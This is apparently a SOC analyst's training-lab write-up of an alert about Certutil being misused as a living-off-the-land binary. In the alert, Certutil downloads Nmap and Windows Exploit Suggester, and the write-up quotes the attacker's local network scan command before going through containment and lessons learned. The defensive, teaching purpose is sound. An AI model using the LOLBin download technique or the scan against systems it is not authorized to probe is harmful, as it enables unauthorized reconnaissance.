In this alert we’re tasked with investigating suspicious usage of the Certutil executable on the “EricProd” host. Event type is marked as LOLBin (Living-off-the-land binary), a Microsoft-signed legitimate binary, which is used by an attacker or an insider for malicious purposes and to avoid detection.
We can use the https://github.com/LOLBAS-Project/LOLBAS repository to gain more insight on the executable in question. Looking up the executable we can see that it is a Windows binary used for handling certificates, and can be used to download and save files from the internet to the host machine.
Alert
When we investigate the alert more closely in the Endpoint Security by accessing the details of the host, diving deeper into the Command History (and subsequently Process History) and zeroing in on the Certutil.exe, we can see that it has been used to do two things: download the setup file for network scanner Nmap and to download Windows Exploit Suggester Python script from a GitHub repository. Both were subsequently ran on 01.03.2021 at 11:06 and 11:07 respectively, raising the alarm in Endpoint Security.
Detection
Looking through the process relationship we can see that Certutil.exe was launched by C:/Windows/System32/cmd.exe, which in turn was launched by explorer.exe. This tells us that it was likely the user who performed the activity, not a malicious piece of software.
Analysis
As established before, Certutil.exe itself is a legitimate binary, signed by Microsoft, but it is part of LOLBins meaning that it can be used to execute commands other than what it was designed for. This is exactly what we can see in the Endpoint Security Command History,
Containment
By now we have established that the host is indeed compromised (True Positive), so in order to proceed we need to Request Containment in the Endpoint Security. We can see in the CMD History that the user had run Nmap with the command nmap -sV 192.168.0.0/24 -p 80 in order to scan the local network for HTTP servers, so we want to isolate the host in order to prevent any possible spread and movement.
Lessons Learned
The key takeaway from this task is that malicious activity can also stem from legitimate and signed binaries, so it is imperative to not only confirm the legitimacy of a file but how the file is actually being used. We can see these relevant details in the Command History and Process History.
Artifacts
For the IoC artifacts we should note the downloading and use of the two tools, network scanner Nmap and Windows Exploit Suggester Python script. Using the URL’s we can utilize a detection solution to look for these specific URL’s in the future.